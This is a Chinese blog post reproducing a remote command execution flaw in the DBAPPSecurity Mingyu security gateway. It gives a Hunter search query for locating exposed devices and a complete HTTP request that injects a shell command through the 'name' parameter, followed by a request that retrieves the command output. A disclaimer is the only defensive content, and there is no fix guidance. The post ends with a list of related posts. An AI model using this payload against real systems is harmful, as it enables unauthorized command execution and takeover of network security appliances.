安恒明御安全网关aaa_local_web_custom_auth_html存在远程命令执行

已于 2025-05-23 13:04:07 修改
阅读量150 收藏 3
点赞数 6
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全 web安全 漏洞复现 漏洞利用 网络安全 漏洞库 渗透测试
于 2025-05-22 23:58:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/148151616

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

一、问题简介

安恒信息明御安全网关(以下简称“NGFW”)秉持安全可视、简单有效的理念,以资产为视角,构建“事前+事中+事后”全流程防御的下一代安全防护体系,并融合传统防火墙、入侵防御系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关。安恒明御安全网关aaa_local_web_custom_auth_html存在远程命令执行。攻击者可通过命令执行获取服务器权限。

二、影响版本

  • 安恒明御安全网关

三、资产测绘

  • hunter  app.name="安恒明御安全网关"

四、问题复现

GET /webui/?g=aaa_local_web_custom_auth_html_submit&name=;echo%09`ls`|tee%09out; HTTP/1.1
Host: 
Cookie: USGSESSID=5c727beed17c9e76eeab71453e91c784
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: keep-alive

获取命令执行结果

GET /webui/out HTTP/1.1
Host: 
Cookie: USGSESSID=5c727beed17c9e76eeab71453e91c784
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: keep-alive
安恒明御安全网关 aaa_local_web_preview文件上传漏洞复现
0xSec
12-15 1274
明御安全网关在aaa_local_web_preview文件处存在文件上传漏洞,攻击者可以利用漏洞上传恶意文件进而进行敏感操作获取服务器权限。
安恒明御安全网关aaa_local_web_preview 任意文件上传漏洞复现
The current road is different, love needs to distinguish between right and wrong
12-18 725
安恒明御安全网关是一个网络安全产品,由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台,用于保护企业网络免受各种网络威胁的攻击。该产品aaa_local_web_preview端点存在文件上传漏洞。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
漏洞复现安恒明御安全网关远程命令执行漏洞
m0_71285176的博客
01-10 2236
明御安全网关秉持安全可视、简单 有效的只理念,以资产为视角,构建全流程防御的下一代安全防护体系,并融合传统防火墙、入侵检测、入侵防御系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关。明御安全网关aaa_portal_auth_config_reset接口处存在RCE漏洞,攻击者通过漏洞可以获取服务器权限。地址:http://xxx.xxxx.xxx/xxx.php
安恒明御网关suffix命令执行漏洞
初岄的博客
10-20 445
安恒明御网关suffix存在命令执行漏洞
安全基础DAY6-服务器安全检测和防御技术
2203_75284077的博客
08-18 510
本文简要介绍了服务器安全风险中的DOS/DDOS攻击及其防御技术。DOS攻击旨在破坏服务可用性,主要手段包括消耗带宽、服务器性能及引发宕机。防御措施包括防火墙代理判断合法请求,以及IPS入侵防御系统。IPS通过流量分析、签名检测和异常检测等技术识别和阻断攻击。此外,文章还提及了WEB攻击检测防御和网页防篡改技术,强调文件保护系统与二次认证的重要性。这些技术共同构成了服务器安全防护体系,保障系统稳定运行。
2025年社会学与安全科学国际会议(ICSSS 2025)
Yangxshy的博客
08-18 509
2025年社会学与安全科学国际会议(ICSSS2025)将于成都举办,聚焦社会学与安全科学的跨学科创新。会议涵盖教育技术、信息安全、应急管理、新材料技术等前沿领域,为学者和行业专家提供交流平台。特别设置技术创新与知识产权论坛,助力研究生成果转化,并提供专利撰写指导及专家互动机会。参会方式包括旁听、汇报演讲或投稿(可被EI/Scopus检索)。🌍🔐📊 (150字)
解决远程桌面连接“为安全考虑,已锁定该用户帐户,原因是登录尝试或密码更改尝试过多”问题
最新发布
goolean的专栏
08-21 134
1、登陆阿里云后台通过ECS的VNC连接,不要直接输入用户名密码,那种还是不让登陆,直接开始vnc连接,出现window登陆画面后,再输入密码。3.依次选择:计算机配置→Windows设置→安全设置→帐户策略→帐户锁定策略。登陆后,运行 gpedit.msc 打开组策略。5.改为“0”,会提示这个,忽略,确定即可。鼠标点不动确定,直接按回车键就可以了。4.双击“帐户锁定阈值”
01 网络信息内容安全--绪论
爱学习爱运动的专栏
08-21 408
【【图解贝叶斯公式】1小时吃透大学四年没整明白的贝叶斯分析推导及垃圾邮件过滤实例(朴素贝叶斯/机器学习算法/MCMC算法/人工智能高数)】https://www.bilibili.com/video/BV1v3VUzjEqN?–人工智能/机器学习/深度学习】https://www.bilibili.com/video/BV1TAtwzTE1S?–人工智能/机器学习/深度学习】https://www.bilibili.com/video/BV1TAtwzTE1S?【都2022年了,居然还不懂社会网络分析?
规避(EDR)安全检测--避免二进制文件落地
shdkfbbv的博客
08-18 767
在 Windows 系统中,执行 VBScript(.vbs)和将C# 代码加载到内存中执行的技术,常被用于减少磁盘操作(避免二进制文件落地),从而降低被 EDR(端点检测与响应)工具检测的概率。
自动驾驶汽车机器学习安全实用解决方案
NewCarRen的博客
08-20 961
摘要:本文探讨了自动驾驶汽车中机器学习算法的安全挑战及其应对策略。文章首先指出当前汽车安全标准(如ISO 26262和ISO/PAS 21448)在应对机器学习特有的可解释性、验证和性能局限等问题上存在不足。通过系统分析机器学习与功能安全标准的五大差距(设计规范、透明度、验证、鲁棒性和监控),作者提出两类实用安全技术:1)基于不确定性估计、错误检测和分布外检测的运行时监控功能;2)通过域适应、多任务学习和数据增强提升模型鲁棒性。研究还讨论了对抗性攻击风险和用户体验设计的重要性,强调需要跨学科合作来确保自动驾
抗辐照CANFD通信芯片在高安全领域国产化替代的研究
ANSILIC的博客
08-18 1231
本文聚焦于抗辐照CANFD通信芯片在高安全领域的国产化替代研究,以厦门国科安芯科技有限公司研发的ASM1042S芯片为例,深入探讨其在抗辐照能力、通信性能及可靠性等方面的表现,分析其国产化替代的可行性与优势,并对未来发展趋势进行展望,旨在为高安全领域的电子设备国产化进程提供有益的参考与借鉴。:高铁列车的运行速度高,对列车控制系统的可靠性和实时性要求极高。同时,在芯片内部设置了多个监测点,能够实时监测芯片的工作状态,一旦检测到单粒子效应引起的异常,可迅速采取措施进行处理,如复位、纠错等,确保芯片的正常运行。
智能网联汽车的软肋:从ECU漏洞看汽车的联网安全
2501_91602431的博客
08-21 609
随着电动化和智能化的发展,汽车已成为高度依赖软件运行的复杂系统,网络安全风险也随之激增。本文从ECU架构入手,结合多起真实攻击案例,解析现代汽车面临的主要威胁,并探讨ISO 21434等安全标准如何指导软件测试和验证,帮助厂商构建更具韧性的车辆系统。
守护通行安全,“AI+虚拟仿真”领航交通设施人才培育
恒点虚拟仿真官方博客
08-19 808
摘要:AI+虚拟仿真技术为交通安全设施教育带来革新,通过构建沉浸式教学系统,解决传统教学理论与实践脱节问题。MR智能互动沙盘等创新工具可模拟多场景操作,提升学生实践能力,满足交通强国战略下的人才需求。该项目顺应政策导向,有效填补专业人才培养缺口,为行业提供新型教育解决方案。
C++智能指针详解:告别内存泄,拥抱安全高效
Zhihuiguoz的博客
08-20 1116
本文系统介绍了C++智能指针的设计原理与使用场景。文章首先分析了手动管理内存的痛点(内存泄、野指针等),引出RAII原则和智能指针的价值。重点讲解了四种智能指针:auto_ptr(管理权转移,已弃用)、unique_ptr(独占所有权)、shared_ptr(引用计数)和weak_ptr(解决循环引用)。通过代码示例演示了各智能指针的特性和模拟实现,特别强调了shared_ptr的线程安全问题(原子操作)及定制删除器的使用。最后详细分析了循环引用问题及weak_ptr的解决方案。
云存储的高效安全助手:阿里云国际站 OSS
TG_yunshuguoji的博客
08-19 954
在数据爆炸时代,阿里云国际站 OSS 提供海量、安全、低成本的云存储解决方案,助力企业与个人高效管理图片、视频、文档等数据,解决存储空间不足、数据安全与成本控制难题,适用于电商、金融、内容创作等多种场景。
水闸安全综合监测系统解决方案
weixin_48039531的博客
08-19 1070
因此,建立科学完善的水闸安全监测体系,通过实时监测水闸的变形、应力、渗流等关键指标,可以及时掌握工程运行状态,为工程管理和应急决策提供重要依据。感知层:配备高精度传感器,包括位移传感器、水位、流量、应力应变传感器、渗压计、倾斜仪等,用于实时采集水闸结构的关键参数。通过对数据的分析,可以了解水闸的结构健康状况、运行状态以及潜在的安全隐患等,为水闸的安全评估和维护提供科学依据。█实时监测:系统能够实时监测水闸的各项参数,如水位、流量、闸门开度、应力、位移、渗流以及振动等。这有助于提高工作效率和减少人力成本。
数字隔离器,变频器安全运行的 “隐形引擎”
HOPERF01的博客
08-18 420
变频器采用数字隔离器实现电气隔离,保障安全与信号稳定,提升系统可靠性。
Linux单服务器漏洞处置SOP框架——最小化应用系统运行环境安全风险
weixin_43727442的博客
08-18 893
备份所有可能被修改的配置文件,例如 /etc 下的服务配置、Tomcat 的 conf 目录、Web 应用部署目录(webapps)、数据库配置文件 my.cnf、Redis 配置文件 redis.conf 等。如果还没有达到,它就会执行必要的操作来使服务器达到目标状态,并且无论执行多少次,最终结果都是一样的,不会有意外发生。/var/log/messages、/var/log/secure、Tomcat 日志(catalina.out)、数据库日志、Redis 日志等,确认没有新的错误或异常信息。
安恒明御安全网关远程命令执行漏洞,风险等级,影响范围,漏洞修复,技术原理,修复建议
03-08
</think>### 安恒明御安全网关远程命令执行漏洞分析 #### 1. **漏洞详情** 远程命令执行漏洞(RCE)通常由于系统未对用户输入进行严格过滤,攻击者可通过构造恶意请求在目标设备上执行任意系统命令,进而控制设备...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值